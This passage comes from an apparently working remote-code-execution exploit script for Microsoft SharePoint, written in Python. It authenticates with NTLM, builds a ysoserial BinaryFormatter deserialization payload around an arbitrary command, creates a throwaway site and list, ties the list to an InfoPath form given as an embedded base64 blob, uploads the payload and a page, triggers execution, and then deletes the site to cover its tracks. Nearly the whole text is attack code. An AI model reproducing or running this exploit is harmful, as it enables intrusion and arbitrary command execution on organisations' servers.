style="display&#58;none;">false,false,1</span></div></div></SharePoint:EmbeddedFormField> <WebPartPages:WebPartZone runat="server" ID="Bottom" CssClass="ms-hide" Title="loc:Bottom"><ZoneTemplate></ZoneTemplate></WebPartPages:WebPartZone> </asp:Content> ''' class Exploit: def __init__(self, args): self.url = args.url self.username = args.username self.password = args.password self.command = args.command self.s = requests.Session() self.s.verify = False self.s.auth = HttpNtlmAuth(self.username, self.password) self.s.headers = { 'User-Agent': 'Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36' } self.payload = subprocess.check_output('./ysoserial/ysoserial.exe -g TypeConfuseDelegate -f BinaryFormatter -c "{}"'.format(self.command)).strip() self.payload = base64.b64decode(self.payload) def trigger(self): site_name = ''.join(random.choice(string.ascii_letters) for i in range(6)) site_title = site_name + ' Site' site_description = '' custom_list_title = site_name + ' List' custom_list_description = '' self.site_url = self.url + '/sites/' + site_name page_name = site_name + '.aspx' print('[*] Creating site') if not self.create_site(site_name, site_title, site_description): print('[-] Exploit failed') exit() print('[*] Creating custom list') if not self.create_custom_list(custom_list_title, custom_list_description): print('[-] Exploit failed') exit() print('[*] Associating custom list with infopath') if not self.associate_list_with_infopath(custom_list_title): print('[-] Exploit failed') exit() print('[*] Uploading payload') key = self.upload_file(custom_list_title, self.payload) if key == '': print('[-] Exploit failed') exit() print('[*] Uploading page') if not self.upload_page(site_name, page_name): print('[-] Exploit failed') exit() print('[*] Executing command') if not self.connect_to_data(page_name, key): print('[-] Exploit failed') exit() print('[*] Cleaning up') if not self.delete_site(site_name): print('[-] Exploit failed') exit() print('[#] Exploit succeeded') def create_site(self, site_name, site_title, site_desc): def check_site(site_name): r = self.s.get(self.url + '/sites/' + site_name) return r.status_code == 200 if check_site(site_name): return False r = self.s.get(self.url + '/_layouts/15/scsignup.aspx') html = BeautifulSoup(r.content, 'html.parser') data = { 'MSOWebPartPage_PostbackSource': html.find('input', {'name': 'MSOWebPartPage_PostbackSource'})['value'], 'MSOTlPn_SelectedWpId': html.find('input', {'name': 'MSOTlPn_SelectedWpId'})['value'], 'MSOTlPn_View': html.find('input', {'name': 'MSOTlPn_View'})['value'], 'MSOTlPn_ShowSettings': html.find('input', {'name': 'MSOTlPn_ShowSettings'})['value'], 'MSOGallery_SelectedLibrary': html.find('input', {'name': 'MSOGallery_SelectedLibrary'})['value'], 'MSOGallery_FilterString': html.find('input', {'name': 'MSOGallery_FilterString'})['value'], 'MSOTlPn_Button': html.find('input', {'name': 'MSOTlPn_Button'})['value'], 'MSOSPWebPartManager_DisplayModeName': html.find('input', {'name': 'MSOSPWebPartManager_DisplayModeName'})['value'], 'MSOSPWebPartManager_ExitingDesignMode': html.find('input', {'name': 'MSOSPWebPartManager_ExitingDesignMode'})['value'], '__EVENTTARGET': 'ctl00$PlaceHolderMain$ctl02$RptControls$BtnCreate', '__EVENTARGUMENT': '', 'MSOWebPartPage_Shared': html.find('input', {'name': 'MSOWebPartPage_Shared'})['value'], 'MSOLayout_LayoutChanges': html.find('input', {'name': 'MSOLayout_LayoutChanges'})['value'], 'MSOLayout_InDesignMode': html.find('input', {'name': 'MSOLayout_InDesignMode'})['value'], 'MSOSPWebPartManager_OldDisplayModeName': html.find('input', {'name': 'MSOSPWebPartManager_OldDisplayModeName'})['value'], 'MSOSPWebPartManager_StartWebPartEditingName': html.find('input', {'name': 'MSOSPWebPartManager_StartWebPartEditingName'})['value'], 'MSOSPWebPartManager_EndWebPartEditing': html.find('input', {'name': 'MSOSPWebPartManager_EndWebPartEditing'})['value'], '_maintainWorkspaceScrollPosition': html.find('input', {'name': '_maintainWorkspaceScrollPosition'})['value'], 'HidDescription0': html.find('input', {'name': 'HidDescription0'})['value'], 'HidDescription1': html.find('input', {'name': 'HidDescription1'})['value'], 'HidDescription2': html.find('input', {'name': 'HidDescription2'})['value'], 'HidDescription3': html.find('input', {'name': 'HidDescription3'})['value'], 'HidDescription4': html.find('input', {'name': 'HidDescription4'})['value'], 'HidDescription5': html.find('input', {'name': 'HidDescription5'})['value'], '__REQUESTDIGEST': html.find('input', {'name': '__REQUESTDIGEST'})['value'], '__VIEWSTATE': html.find('input', {'name': '__VIEWSTATE'})['value'], '__VIEWSTATEGENERATOR': html.find('input', {'name': '__VIEWSTATEGENERATOR'})['value'], '__SCROLLPOSITIONX': html.find('input', {'name': '__SCROLLPOSITIONX'})['value'], '__SCROLLPOSITIONY': html.find('input', {'name': '__SCROLLPOSITIONY'})['value'], '__EVENTVALIDATION': html.find('input', {'name': '__EVENTVALIDATION'})['value'], 'ctl00$PlaceHolderMain$HidOwnerLogin': '', 'ctl00$PlaceHolderMain$ctl00$ctl01$TxtTitle': site_title, 'ctl00$PlaceHolderMain$ctl00$ctl02$TxtDescription': site_desc, 'ctl00$PlaceHolderMain$ctl01$ctl03$DdlPrefix': 'sites', 'ctl00$PlaceHolderMain$ctl01$ctl03$TxtSiteName': site_name, 'ctl00$PlaceHolderMain$InputFormTemplatePickerControl$ctl00$ctl01$HiddenSelectedCategory': '', 'ctl00$PlaceHolderMain$InputFormTemplatePickerControl$ctl00$ctl01$LbWebTemplate': 'STS#0', } r = self.s.post(self.url + '/_layouts/15/scsignup.aspx', data=data) if r.content.find(b'Error') != -1: return False time.sleep(5) if not check_site(site_name): return False return True def delete_site(self, site_name): r = self.s.get(self.site_url + '/_layouts/15/deleteweb.aspx') html = BeautifulSoup(r.content, 'html.parser') data = { '__MINIMALDOWNLOAD': 1, 'MSOWebPartPage_PostbackSource': '', 'MSOTlPn_SelectedWpId': '', 'MSOTlPn_View': 0, 'MSOTlPn_ShowSettings': 'False', 'MSOGallery_SelectedLibrary': '', 'MSOGallery_FilterString': '', 'MSOTlPn_Button': 'none', '__EVENTTARGET': 'ctl00$PlaceHolderMain$ctl07$RptControls$BtnDelete', '__EVENTARGUMENT': '', 'MSOSPWebPartManager_DisplayModeName': 'Browse', 'MSOSPWebPartManager_ExitingDesignMode': 'false', 'MSOWebPartPage_Shared': '', 'MSOLayout_LayoutChanges': '', 'MSOLayout_InDesignMode': '', 'MSOSPWebPartManager_OldDisplayModeName': 'Browse', 'MSOSPWebPartManager_StartWebPartEditingName': 'false', 'MSOSPWebPartManager_EndWebPartEditing': 'false', '_maintainWorkspaceScrollPosition': '0', '__REQUESTDIGEST': html.find('input', {'name': '__REQUESTDIGEST'})['value'], '__VIEWSTATE': html.find('input', {'name': '__VIEWSTATE'})['value'], '__VIEWSTATEGENERATOR': html.find('input', {'name': '__VIEWSTATEGENERATOR'})['value'], '__SCROLLPOSITIONX': 0, '__SCROLLPOSITIONY': 0, '__EVENTVALIDATION': html.find('input', {'name': '__EVENTVALIDATION'})['value'], 'AjaxDelta': 1 } r = self.s.post(self.site_url + '/_layouts/15/deleteweb.aspx', data=data) return r.content.decode('latin-1').find('webdeleted') != -1 def create_custom_list(self, list_title, list_desc): params = { 'task': 'GetMyApps', 'sort': 1, 'query': '', 'myappscatalog': 0, 'ci': 0, 'vd': 0 } r = self.s.get(self.site_url + '/_layouts/15/addanapp.aspx', params=params) content = json.loads(r.content) custom_list_app = list(filter(lambda x: x['Title'] == 'Custom List', content))[0]['ID'] list_template = custom_list_app.split(';')[2] feature_id = '{' + custom_list_app.split(';')[1] + '}' r = self.s.get(self.site_url + '/_layouts/15/new.aspx') html = BeautifulSoup(r.content, 'html.parser') params = { 'FeatureId': feature_id, 'ListTemplate': list_template, 'IsDlg': 1 } data = { 'MSOWebPartPage_PostbackSource': html.find('input', {'name': 'MSOWebPartPage_PostbackSource'})['value'], 'MSOTlPn_SelectedWpId': html.find('input', {'name': 'MSOTlPn_SelectedWpId'})['value'], 'MSOTlPn_View': html.find('input', {'name': 'MSOTlPn_View'})['value'], 'MSOTlPn_ShowSettings': html.find('input', {'name': 'MSOTlPn_ShowSettings'})['value'], 'MSOGallery_SelectedLibrary': html.find('input', {'name': 'MSOGallery_SelectedLibrary'})['value'], 'MSOGallery_FilterString': html.find('input', {'name': 'MSOGallery_FilterString'})['value'], 'MSOTlPn_Button': html.find('input', {'name': 'MSOTlPn_Button'})['value'], 'MSOSPWebPartManager_DisplayModeName': html.find('input', {'name': 'MSOSPWebPartManager_DisplayModeName'})['value'], 'MSOSPWebPartManager_ExitingDesignMode': html.find('input', {'name': 'MSOSPWebPartManager_ExitingDesignMode'})['value'], '__EVENTTARGET': 'ctl00$PlaceHolderMain$onetidCreateList', '__EVENTARGUMENT': '', 'MSOWebPartPage_Shared': html.find('input', {'name': 'MSOWebPartPage_Shared'})['value'], 'MSOLayout_LayoutChanges': html.find('input', {'name': 'MSOLayout_LayoutChanges'})['value'], 'MSOLayout_InDesignMode': html.find('input', {'name': 'MSOLayout_InDesignMode'})['value'], 'MSOSPWebPartManager_OldDisplayModeName': html.find('input', {'name': 'MSOSPWebPartManager_OldDisplayModeName'})['value'], 'MSOSPWebPartManager_StartWebPartEditingName': html.find('input', {'name': 'MSOSPWebPartManager_StartWebPartEditingName'})['value'], 'MSOSPWebPartManager_EndWebPartEditing': html.find('input', {'name': 'MSOSPWebPartManager_EndWebPartEditing'})['value'], '_maintainWorkspaceScrollPosition': html.find('input', {'name': '_maintainWorkspaceScrollPosition'})['value'], '__REQUESTDIGEST': html.find('input', {'name': '__REQUESTDIGEST'})['value'], '__VIEWSTATE': html.find('input', {'name': '__VIEWSTATE'})['value'], '__VIEWSTATEGENERATOR': html.find('input', {'name': '__VIEWSTATEGENERATOR'})['value'], '__SCROLLPOSITIONX': html.find('input', {'name': '__SCROLLPOSITIONX'})['value'], '__SCROLLPOSITIONY': html.find('input', {'name': '__SCROLLPOSITIONY'})['value'], '__EVENTVALIDATION': html.find('input', {'name': '__EVENTVALIDATION'})['value'], 'Title': list_title, 'FeatureId': feature_id, 'ListTemplate': list_template, 'Project': self.site_url, 'Description': list_desc, 'Cmd': 'NewList' } r = self.s.post(self.site_url + '/_layouts/15/new.aspx', params=params, data=data) if r.content.find(b'Error') != -1: return False return True def associate_list_with_infopath(self, list_title): headers = { 'Content-Type': 'text/xml; charset=utf-8' } data = textwrap.dedent('''\ <?xml version="1.0" encoding="utf-8"?> <soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"> <soap:Body> <GetListCollection xmlns="http://schemas.microsoft.com/sharepoint/soap/" /> </soap:Body> </soap:Envelope>''' ) r = self.s.post(self.site_url + '/_vti_bin/lists.asmx', headers=headers, data=data) list_id = '' lists = ET.fromstring(r.content)[0][0][0][0] for list in lists: if list.attrib['Title'] == list_title: list_id = list.attrib['ID'] break headers = { 'Cookie': 'databaseBtnText=0; databaseBtnDesc=0; WSS_FullScreenMode=false; splnu=0', 'If-Modified-Since': 'Wed, 11 May 2000 11:23:18 GMT' } r = self.s.get(self.site_url + '/Lists/' + list_title + '/NewForm.aspx', headers=headers) content_type_id = r.content.decode('latin-1') content_type_id = content_type_id[content_type_id.find('ItemContentTypeId":"')+20:] content_type_id = content_type_id[:content_type_id.find('"')] xsn = 'TVNDRgAAAACy8gAAAAAAACwAAAAAAAAAAwEBAAoAAAAAAAAARgEAAAIAAADrIAAAAAAAAAAAq1T6eAAAbWFuaWZlc3QueHNmAMYGAADrIAAAAACrVPp4AABzYW1wbGVkYXRhLnhtbAA/BwAAsScAAAAAq1T6eAAAc2NoZW1hLnhzZACBDAAA8C4AAAAAq1T6eAAAc2NoZW1hMS54c2QAdx8AAHE7AAAAAKtU+ngAAHNjaGVtYTIueHNkAN0MAADoWgAAAACrVPp4AABzY2hlbWEzLnhzZADVBwAAxWcAAAAAq1T6eAAAc2NoZW1hNC54c2QA5AcAAJpvAAAAAKtU+ngAAHRlbXBsYXRlLnhtbAAdLQAAfncAAAAAq1T6eAAAdXBncmFkZS54c2wAwUwAAJukAAAAAKtU+ngAAHZpZXcxLnhzbAAkxnf1AIAAgDw/eG1sIHZlcnNpb249IjEuMCIgZW5jb2Rpbmc9IlVURi04Ij8+DQo8IS0tDQpUaGlzIGZpbGUgaXMgYXV0b21hdGljYWxseSBjcmVhdGVkIGFuZCBtb2RpZmllZCBieSBNaWNyb3NvZnQgSW5mb1BhdGguDQpDaGFuZ2VzIG1hZGUgdG8gdGhlIGZpbGUgb3V0c2lkZSBvZiBJbmZvUGF0aCBtaWdodCBiZSBsb3N0IGlmIHRoZSBmb3JtIHRlbXBsYXRlIGlzIG1vZGlmaWVkIGluIEluZm9QYXRoLg0KLS0+DQo8eHNmOnhEb2N1bWVudENsYXNzIG5hbWU9InVybjpzY2hlbWFzLW1pY3Jvc29mdC1jb206b2ZmaWNlOmluZm9wYXRoOmxpc3Q6LUF1dG9HZW4tMjAyMi0wNS0wMVQyMjoyMzoyOTo5NloiIHNvbHV0aW9uRm9ybWF0VmVyc2lvbj0iMy4wLjAuMCIgc29sdXRpb25WZXJzaW9uPSIxLjAuMC4yIiBwcm9kdWN0VmVyc2lvbj0iMTUuMC4wIiB4bWxuczp4c2Y9Imh0dHA6Ly9zY2hlbWFzLm1pY3Jvc29mdC5jb20vb2ZmaWNlL2luZm9wYXRoLzIwMDMvc29sdXRpb25EZWZpbml0aW9uIiB4bWxuczp4c2YyPSJodHRwOi8vc2NoZW1hcy5taWNyb3NvZnQuY29tL29mZmljZS9pbmZvcGF0aC8yMDA2L3NvbHV0aW9uRGVmaW5pdGlvbi9leHRlbnNpb25zIiB4bWxuczp4c2YzPSJodHRwOi8vc2NoZW1hcy5taWNyb3NvZnQuY29tL29mZmljZS9pbmZvcGF0aC8yMDA5L3NvbHV0aW9uRGVmaW5pdGlvbi9leHRlbnNpb25zIiB4bWxuczptc3hzbD0idXJuOnNjaGVtYXMtbWljcm9zb2Z0LWNvbTp4c2x0IiB4bWxuczp4ZD0iaHR0cDovL3NjaGVtYXMubWljcm9zb2Z0LmNvbS9vZmZpY2UvaW5mb3BhdGgvMjAwMyIgeG1sbnM6eHNpPSJodHRwOi8vd3d3LnczLm9yZy8yMDAxL1hNTFNjaGVtYS1pbnN0YW5jZSIgeG1sbnM6eGRVdGlsPSJodHRwOi8vc2NoZW1hcy5taWNyb3NvZnQuY29tL29mZmljZS9pbmZvcGF0aC8yMDAzL3hzbHQvVXRpbCIgeG1sbnM6eGRYRG9jdW1lbnQ9Imh0dHA6Ly9zY2hlbWFzLm1pY3Jvc29mdC5jb20vb2ZmaWNlL2luZm9wYXRoLzIwMDMveHNsdC94RG9jdW1lbnQiIHhtbG5zOnhkTWF0aD0iaHR0cDovL3NjaGVtYXMubWljcm9zb2Z0LmNvbS9vZmZpY2UvaW5mb3BhdGgvMjAwMy94c2x0L01hdGgiIHhtbG5zOnhkRGF0ZT0iaHR0cDovL3NjaGVtYXMubWljcm9zb2Z0LmNvbS9vZmZpY2UvaW5mb3BhdGgvMjAwMy94c2x0L0RhdGUiIHhtbG5zOnhkRXh0ZW5zaW9uPSJodHRwOi8vc2NoZW1hcy5taWNyb3NvZnQuY29tL29mZmljZS9pbmZvcGF0aC8yMDAzL3hzbHQvZXh0ZW5zaW9uIiB4bWxuczp4ZEVudmlyb25tZW50PSJodHRwOi8vc2NoZW1hcy5taWNyb3NvZnQuY29tL29mZmljZS9pbmZvcGF0aC8yMDA2L3hzbHQvZW52aXJvbm1lbnQiIHhtbG5zOnhkVXNlcj0iaHR0cDovL3NjaGVtYXMubWljcm9zb2Z0LmNvbS9vZmZpY2UvaW5mb3BhdGgvMjAwNi94c2x0L1VzZXIiIHhtbG5zOm15PSJodHRwOi8vc2NoZW1hcy5taWNyb3NvZnQuY29tL29mZmljZS9pbmZvcGF0aC8yMDA5L1dTU0xpc3QvY21lRGF0YUZpZWxkcyIgeG1sbnM6ZGZzPSJodHRwOi8vc2NoZW1hcy5taWNyb3NvZnQuY29tL29mZmljZS9pbmZvcGF0aC8yMDAzL2RhdGFGb3JtU29sdXRpb24iIHhtbG5zOmQ9Imh0dHA6Ly9zY2hlbWFzLm1pY3Jvc29mdC5jb20vb2ZmaWNlL2luZm9wYXRoLzIwMDkvV1NTTGlzdC9kYXRhRmllbGRzIiB4bWxuczpwYz0iaHR0cDovL3NjaGVtYXMubWljcm9zb2Z0LmNvbS9vZmZpY2UvaW5mb3BhdGgvMjAwNy9QYXJ0bmVyQ29udHJvbHMiIHhtbG5zOnhkU2VydmVySW5mbz0iaHR0cDovL3NjaGVtYXMubWljcm9zb2Z0LmNvbS9vZmZpY2UvaW5mb3BhdGgvMjAwOS94c2x0L1NlcnZlckluZm8iIHhtbG5zOm1hPSJodHRwOi8vc2NoZW1hcy5taWNyb3NvZnQuY29tL29mZmljZS8yMDA5L21ldGFkYXRhL3Byb3BlcnRpZXMvbWV0YUF0dHJpYnV0ZXMiIHhtbG5zOnE9Imh0dHA6Ly9zY2hlbWFzLm1pY3Jvc29mdC5jb20vb2ZmaWNlL2luZm9wYXRoLzIwMDkvV1NTTGlzdC9xdWVyeUZpZWxkcyIgeG1sbnM6ZG1zPSJodHRwOi8vc2NoZW1hcy5taWNyb3NvZnQuY29tL29mZmljZS8yMDA5L2RvY3VtZW50TWFuYWdlbWVudC90eXBlcyI+DQoJPHhzZjpwYWNrYWdlPg0KCQk8eHNmOmZpbGVzPg0KCQkJPHhzZjpmaWxlIG5hbWU9InRlbXBsYXRlLnhtbCI+PC94c2Y6ZmlsZT4NCgkJCTx4c2Y6ZmlsZSBuYW1lPSJzYW1wbGVkYXRhLnhtbCI+DQoJCQkJPHhzZjpmaWxlUHJvcGVydGllcz4NCgkJCQkJPHhzZjpwcm9wZXJ0eSBuYW1lPSJmaWxlVHlwZSIgdHlwZT0ic3RyaW5nIiB2YWx1ZT0ic2FtcGxlRGF0YSI+PC94c2Y6cHJvcGVydHk+DQoJCQkJPC94c2Y6ZmlsZVByb3BlcnRpZXM+DQoJCQk8L3hzZjpmaWxlPg0KCQkJPHhzZjpmaWxlIG5hbWU9InZpZXcxLnhzbCI+DQoJCQkJPHhzZjpmaWxlUHJvcGVydGllcz4NCgkJCQkJPHhzZjpwcm9wZXJ0eSBuYW1lPSJsYW5nIiB0eXBlPSJzdHJpbmciIHZhbHVlPSIxMDMzIj48L3hzZjpwcm9wZXJ0eT4NCgkJCQkJPHhzZjpwcm9wZXJ0eSBuYW1lPSJtb2RlIiB0eXBlPSJzdHJpbmciIHZhbHVlPSIxIj48L3hzZjpwcm9wZXJ0eT4NCgkJCQk8L3hzZjpmaWxlUHJvcGVydGllcz4NCgkJCTwveHNmOmZpbGU+DQoJCQk8eHNmOmZpbGUgbmFtZT0ic2NoZW1hLnhzZCI+DQoJCQkJPHhzZjpmaWxlUHJvcGVydGllcz4NCgkJCQkJPHhzZjpwcm9wZXJ0eSBuYW1lPSJlZGl0YWJpbGl0eSIgdHlwZT0ic3RyaW5nIiB2YWx1ZT0ibm9uZSI+PC94c2Y6cHJvcGVydHk+DQoJCQkJCTx4c2Y6cHJvcGVydHkgbmFtZT0ibmFtZXNwYWNlIiB0eXBlPSJzdHJpbmciIHZhbHVlPSJodHRwOi8vc2NoZW1hcy5taWNyb3NvZnQuY29tL29mZmljZS9pbmZvcGF0aC8yMDAzL2RhdGFGb3JtU29sdXRpb24iPjwveHNmOnByb3BlcnR5Pg0KCQkJCQk8eHNmOnByb3BlcnR5IG5hbWU9InJvb3RFbGVtZW50IiB0eXBlPSJzdHJpbmciIHZhbHVlPSJteUZpZWxkcyI+PC94c2Y6cHJvcGVydHk+DQoJCQkJCTx4c2Y6cHJvcGVydHkgbmFtZT0idXNlT25EZW1hbmRBbGdvcml0aG0iIHR5cGU9InN0cmluZyIgdmFsdWU9InllcyI+PC94c2Y6cHJvcGVydHk+DQoJCQkJPC94c2Y6ZmlsZVByb3BlcnRpZXM+DQoJCQk8L3hzZjpmaWxlPg0KCQkJPHhzZjpmaWxlIG5hbWU9InNjaGVtYTEueHNkIj4NCgkJCQk8eHNmOmZpbGVQcm9wZXJ0aWVzPg0KCQkJCQk8eHNmOnByb3BlcnR5IG5hbWU9Im5hbWVzcGFjZSIgdHlwZT0ic3RyaW5nIiB2YWx1ZT0iaHR0cDovL3NjaGVtYXMubWljcm9zb2Z0LmNvbS9vZmZpY2UvaW5mb3BhdGgvMjAwOS9XU1NMaXN0L2NtZURhdGFGaWVsZHMiPjwveHNmOnByb3BlcnR5Pg0KCQkJCQk8eHNmOnByb3BlcnR5IG5hbWU9ImVkaXRhYmlsaXR5IiB0eXBlPSJzdHJpbmciIHZhbHVlPSJmdWxsIj48L3hzZjpwcm9wZXJ0eT4NCgkJCQk8L3hzZjpmaWxlUHJvcGVydGllcz4NCgkJCTwveHNmOmZpbGU+DQoJCQk8eHNmOmZpbGUgbmFtZT0ic2NoZW1hMi54c2QiPg0KCQkJCTx4c2Y6ZmlsZVByb3BlcnRpZXM+DQoJCQkJCTx4c2Y6cHJvcGVydHkgbmFtZT0ibmFtZXNwYWNlIiB0eXBlPSJzdHJpbmciIHZhbHVlPSJodHRwOi8vc2NoZW1hcy5taWNyb3NvZnQuY29tL29mZmljZS8yMDA5L2RvY3VtZW50TWFuYWdlbWVudC90eXBlcyI+PC94c2Y6cHJvcGVydHk+DQoJCQkJCTx4c2Y6cHJvcGVydHkgbmFtZT0iZWRpdGFiaWxpdHkiIHR5cGU9InN0cmluZyIgdmFsdWU9Im5vbmUiPjwveHNmOnByb3BlcnR5Pg0KCQkJCTwveHNmOmZpbGVQcm9wZXJ0aWVzPg0KCQkJPC94c2Y6ZmlsZT4NCgkJCTx4c2Y6ZmlsZSBuYW1lPSJzY2hlbWEzLnhzZCI+DQoJCQkJPHhzZjpmaWxlUHJvcGVydGllcz4NCgkJCQkJPHhzZjpwcm9wZXJ0eSBuYW1lPSJuYW1lc3BhY2UiIHR5cGU9InN0cmluZyIgdmFsdWU9Imh0dHA6Ly9zY2hlbWFzLm1pY3Jvc29mdC5jb20vb2ZmaWNlL2luZm9wYXRoLzIwMDcvUGFydG5lckNvbnRyb2xzIj48L3hzZjpwcm9wZXJ0eT4NCgkJCQkJPHhzZjpwcm9wZXJ0eSBuYW1lPSJlZGl0YWJpbGl0eSIgdHlwZT0ic3RyaW5nIiB2YWx1ZT0ibm9uZSI+PC94c2Y6cHJvcGVydHk+DQoJCQkJPC94c2Y6ZmlsZVByb3BlcnRpZXM+DQoJCQk8L3hzZjpmaWxlPg0KCQkJPHhzZjpmaWxlIG5hbWU9InNjaGVtYTQueHNkIj4NCgkJCQk8eHNmOmZpbGVQcm9wZXJ0aWVzPg0KCQkJCQk8eHNmOnByb3BlcnR5IG5hbWU9Im5hbWVzcGFjZSIgdHlwZT0ic3RyaW5nIiB2YWx1ZT0iaHR0cDovL3NjaGVtYXMubWljcm9zb2Z0LmNvbS9vZmZpY2UvaW5mb3BhdGgvMjAwOS9XU1NMaXN0L3F1ZXJ5RmllbGRzIj48L3hzZjpwcm9wZXJ0eT4NCgkJCQkJPHhzZjpwcm9wZXJ0eSBuYW1lPSJlZGl0YWJpbGl0eSIgdHlwZT0ic3RyaW5nIiB2YWx1ZT0ibm9uZSI+PC94c2Y6cHJvcGVydHk+DQoJCQkJPC94c2Y6ZmlsZVByb3BlcnRpZXM+DQoJCQk8L3hzZjpmaWxlPg0KCQkJPHhzZjpmaWxlIG5hbWU9InVwZ3JhZGUueHNsIj48L3hzZjpmaWxlPg0KCQk8L3hzZjpmaWxlcz4NCgk8L3hzZjpwYWNrYWdlPg0KCTx4c2Y6aW1wb3J0UGFyYW1ldGVycyBlbmFibGVkPSJ5ZXMiPjwveHNmOmltcG9ydFBhcmFtZXRlcnM+DQoJPHhzZjpkb2N1bWVudFZlcnNpb25VcGdyYWRlPg0KCQk8eHNmOnVzZVRyYW5zZm9ybSB0cmFuc2Zvcm09InVwZ3JhZGUueHNsIiBtaW5WZXJzaW9uVG9VcGdyYWRlPSIwLjAuMC4wIiBtYXhWZXJzaW9uVG9VcGdyYWRlPSIxLjAuMC4xIj48L3hzZjp1c2VUcmFuc2Zvcm0+DQoJPC94c2Y6ZG9jdW1lbnRWZXJzaW9uVXBncmFkZT4NCgk8eHNmOmV4dGVuc2lvbnM+DQoJCTx4c2Y6ZXh0ZW5zaW9uIG5hbWU9IlNvbHV0aW9uRGVmaW5pdGlvbkV4dGVuc2lvbnMiPg0KCQkJPHhzZjI6c29sdXRpb25EZWZpbml0aW9uIHJ1bnRpbWVDb21wYXRpYmlsaXR5PSJjbGllbnQgc2VydmVyIiBydW50aW1lQ29tcGF0aWJpbGl0eVVSTD0iLi4vLi4vLi4vX3Z0aV9iaW4vRm9ybXNTZXJ2aWNlcy5hc214IiB2ZXJpZnlPblNlcnZlcj0ieWVzIiBhbGxvd0NsaWVudE9ubHlDb2RlPSJubyI+DQoJCQkJPHhzZjI6b2ZmbGluZSBvcGVuSWZRdWVyeUZhaWxzPSJ5ZXMiIGNhY2hlUXVlcmllcz0ieWVzIj48L3hzZjI6b2ZmbGluZT4NCgkJCQk8eHNmMjpzZXJ2ZXIgaXNQcmVTdWJtaXRQb3N0QmFja0VuYWJsZWQ9Im5vIiBpc01vYmlsZUVuYWJsZWQ9Im5vIiBmb3JtTG9jYWxlPSJlbi1VUyI+PC94c2YyOnNlcnZlcj4NCgkJCQk8eHNmMjpzb2x1dGlvblByb3BlcnRpZXNFeHRlbnNpb24gYnJhbmNoPSJsaXN0Ij4NCgkJCQkJPHhzZjI6bGlzdCBwYXRoPSIuLi8uLi8uLi8iPjwveHNmMjpsaXN0Pg0KCQkJCTwveHNmMjpzb2x1dGlvblByb3BlcnRpZXNFeHRlbnNpb24+DQoJCQkJPHhzZjI6dmlld3NFeHRlbnNpb24+DQoJCQkJCTx4c2YyOnZpZXdFeHRlbnNpb24gcmVmPSJFZGl0IGl0ZW0iIGNsaWVudE9ubHk9Im5vIj48L3hzZjI6dmlld0V4dGVuc2lvbj4NCgkJCQk8L3hzZjI6dmlld3NFeHRlbnNpb24+DQoJCQk8L3hzZjI6c29sdXRpb25EZWZpbml0aW9uPg0KCQkJPHhzZjM6c29sdXRpb25Qcm9wZXJ0aWVzRXh0ZW5zaW9uMjAwOT4NCgkJCQk8eHNmMzpzb2x1dGlvbk1vZGUgbW9kZT0ibGlzdCIgb3JpZ2luYWxQdWJsaXNoVXJsPSIuLi8uLi8uLi8iIGlzTGlzdEVkaXRGb3JtPSJ5ZXMiPjwveHNmMzpzb2x1dGlvbk1vZGU+DQoJCQk8L3hzZjM6c29sdXRpb25Qcm9wZXJ0aWVzRXh0ZW5zaW9uMjAwOT4NCgkJCTx4c2YzOnNvbHV0aW9uRGVmaW5pdGlvbj4NCgkJCQk8eHNmMzp2aWV3c0V4dGVuc2lvbj4NCgkJCQkJPHhzZjM6dmlld0V4dGVuc2lvbiByZWY9IkVkaXQgaXRlbSI+PC94c2YzOnZpZXdFeHRlbnNpb24+DQoJCQkJPC94c2YzOnZpZXdzRXh0ZW5zaW9uPg0KCQkJCTx4c2YzOmJhc2VVcmwgcmVsYXRpdmVVcmxCYXNlPSJTSVRFX1VSTCI+PC94c2YzOmJhc2VVcmw+DQoJCQk8L3hzZjM6c29sdXRpb25EZWZpbml0aW9uPg0KCQk8L3hzZjpleHRlbnNpb24+DQoJPC94c2Y6ZXh0ZW5zaW9ucz4NCgk8eHNmOmFwcGxpY2F0aW9uUGFyYW1ldGVycyBhcHBsaWNhdGlvbj0iSW5mb1BhdGggRGVzaWduIE1vZGUiPg0KCQk8eHNmOnNvbHV0aW9uUHJvcGVydGllcyBmdWxseUVkaXRhYmxlTmFtZXNwYWNlPSJodHRwOi8vc2NoZW1hcy5taWNyb3NvZnQuY29tL29mZmljZS9pbmZvcGF0aC8yMDA5L1dTU0xpc3QvY21lRGF0YUZpZWxkcyIgbGFzdE9wZW5WaWV3PSJ2aWV3MS54c2wiIGxhc3RWZXJzaW9uTmVlZGluZ1RyYW5zZm9ybT0iMS4wLjAuMSI+PC94c2Y6c29sdXRpb25Qcm9wZXJ0aWVzPg0KCTwveHNmOmFwcGxpY2F0aW9uUGFyYW1ldGVycz4NCgk8eHNmOmRvY3VtZW50U2NoZW1hcz4NCgkJPHhzZjpkb2N1bWVudFNjaGVtYSByb290U2NoZW1hPSJ5ZXMiIGxvY2F0aW9uPSJodHRwOi8vc2NoZW1hcy5taWNyb3NvZnQuY29tL29mZmljZS9pbmZvcGF0aC8yMDAzL2RhdGFGb3JtU29sdXRpb24gc2NoZW1hLnhzZCI+PC94c2Y6ZG9jdW1lbnRTY2hlbWE+DQoJCTx4c2Y6ZG9jdW1lbnRTY2hlbWEgbG9jYXRpb249Imh0dHA6Ly9zY2hlbWFzLm1pY3Jvc29mdC5jb20vb2ZmaWNlL2luZm9wYXRoLzIwMDkvV1NTTGlzdC9jbWVEYXRhRmllbGRzIHNjaGVtYTEueHNkIj48L3hzZjpkb2N1bWVudFNjaGVtYT4NCgkJPHhzZjpkb2N1bWVudFNjaGVtYSBsb2NhdGlvbj0iaHR0cDovL3NjaGVtYXMubWljcm9zb2Z0LmNvbS9vZmZpY2UvMjAwOS9kb2N1bWVudE1hbmFnZW1lbnQvdHlwZXMgc2NoZW1hMi54c2QiPjwveHNmOmRvY3VtZW50U2NoZW1hPg0KCQk8eHNmOmRvY3VtZW50U2NoZW1hIGxvY2F0aW9uPSJodHRwOi8vc2NoZW1hcy5taWNyb3NvZnQuY29tL29mZmljZS9pbmZvcGF0aC8yMDA3L1BhcnRuZXJDb250cm9scyBzY2hlbWEzLnhzZCI+PC94c2Y6ZG9jdW1lbnRTY2hlbWE+DQoJCTx4c2Y6ZG9jdW1lbnRTY2hlbWEgbG9jYXRpb249Imh0dHA6Ly9zY2hlbWFzLm1pY3Jvc29mdC5jb20